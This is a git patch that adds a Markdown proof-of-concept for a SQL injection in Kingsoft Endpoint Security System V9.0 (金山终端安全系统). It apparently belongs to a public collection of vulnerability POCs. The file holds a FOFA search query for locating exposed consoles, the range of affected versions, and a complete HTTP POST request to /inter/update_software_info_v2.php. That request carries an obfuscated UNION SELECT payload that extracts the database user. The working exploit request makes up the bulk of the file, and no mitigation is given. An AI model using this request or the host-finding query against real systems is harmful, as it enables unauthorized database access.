From fc8c38e36c36019fe795263496a52e9eaefe98c1 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 21 Oct 2023 09:30:44 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E5=B1=B1=E7=BB=88=E7=AB=AF?=
 =?UTF-8?q?=E5=AE=89=E5=85=A8=E7=B3=BB=E7=BB=9FV9.0=20SQL=E6=B3=A8?=
 =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 金山终端安全系统V9.0 SQL注入漏洞.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 金山终端安全系统V9.0 SQL注入漏洞.md

diff --git a/金山终端安全系统V9.0 SQL注入漏洞.md b/金山终端安全系统V9.0 SQL注入漏洞.md
new file mode 100644
index 0000000..0cc8672
--- /dev/null
+++ b/金山终端安全系统V9.0 SQL注入漏洞.md	
@@ -0,0 +1,19 @@
+## 金山终端安全系统V9.0 SQL注入漏洞
+
+## fofa查询语法
+```
+app="金山终端安全系统V9.0Web控制台"
+```
+
+## 影响版本
+金山终端安全系统 V9.0 < V9.SP1.E1008
+
+## POC
+```
+POST /inter/update_software_info_v2.php HTTP/1.1 
+Content-Type: application/x-www-form-urlencoded 
+Host: ip:port
+Content-Length: 81
+
+type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
+```